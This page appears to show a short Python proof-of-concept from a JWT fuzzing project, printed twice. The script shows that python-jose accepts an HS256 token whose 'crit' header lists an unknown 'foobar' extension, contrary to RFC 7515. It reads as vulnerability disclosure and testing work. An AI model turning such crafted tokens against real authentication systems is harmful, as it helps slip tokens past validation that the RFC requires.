findings/poc/F002-pyjose-poc.py · JWT Differential Fuzzer

39 lines · python

"""PoC: python-jose accepts a JWS with an unrecognized critical extension,
in violation of RFC 7515 §4.1.11.
 
Run: python3 findings/poc/F002-pyjose-poc.py
"""
import base64
import hashlib
import hmac
import json
 
import jose
from jose import jwt
 
print(f"python-jose version: {getattr(jose, '__version__', '3.3.0')}")
 
secret = "schism-secret"
header = {"alg": "HS256", "typ": "JWT", "crit": ["foobar"], "foobar": True}
claims = {"sub": "alice", "iat": 1700000000, "exp": 9999999999}
 
def b64u(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()
 
h = b64u(json.dumps(header, separators=(",", ":")).encode())
p = b64u(json.dumps(claims, separators=(",", ":")).encode())
sig = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
token = f"{h}.{p}.{b64u(sig)}"
 
print(f"token: {token}")
print(f"token header (decoded): {json.dumps(header)}")
 
try:
    decoded = jwt.decode(token, secret, algorithms=["HS256"])
    print(f"RESULT: ACCEPTED - {decoded}")
    print(
        "RFC 7515 §4.1.11 requires this token be REJECTED because the\n"
        "recipient (python-jose) does not understand the 'foobar' extension."
    )
except Exception as e:
    print(f"RESULT: REJECTED - {type(e).__name__}: {e}")

1	"""PoC: python-jose accepts a JWS with an unrecognized critical extension,
2	in violation of RFC 7515 §4.1.11.
3
4	Run: python3 findings/poc/F002-pyjose-poc.py
5	"""
6	import base64
7	import hashlib
8	import hmac
9	import json
10
11	import jose
12	from jose import jwt
13
14	print(f"python-jose version: {getattr(jose, '__version__', '3.3.0')}")
15
16	secret = "schism-secret"
17	header = {"alg": "HS256", "typ": "JWT", "crit": ["foobar"], "foobar": True}
18	claims = {"sub": "alice", "iat": 1700000000, "exp": 9999999999}
19
20	def b64u(b: bytes) -> str:
21	return base64.urlsafe_b64encode(b).rstrip(b"=").decode()
22
23	h = b64u(json.dumps(header, separators=(",", ":")).encode())
24	p = b64u(json.dumps(claims, separators=(",", ":")).encode())
25	sig = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
26	token = f"{h}.{p}.{b64u(sig)}"
27
28	print(f"token: {token}")
29	print(f"token header (decoded): {json.dumps(header)}")
30
31	try:
32	decoded = jwt.decode(token, secret, algorithms=["HS256"])
33	print(f"RESULT: ACCEPTED - {decoded}")
34	print(
35	"RFC 7515 §4.1.11 requires this token be REJECTED because the\n"
36	"recipient (python-jose) does not understand the 'foobar' extension."
37	)
38	except Exception as e:
39	print(f"RESULT: REJECTED - {type(e).__name__}: {e}")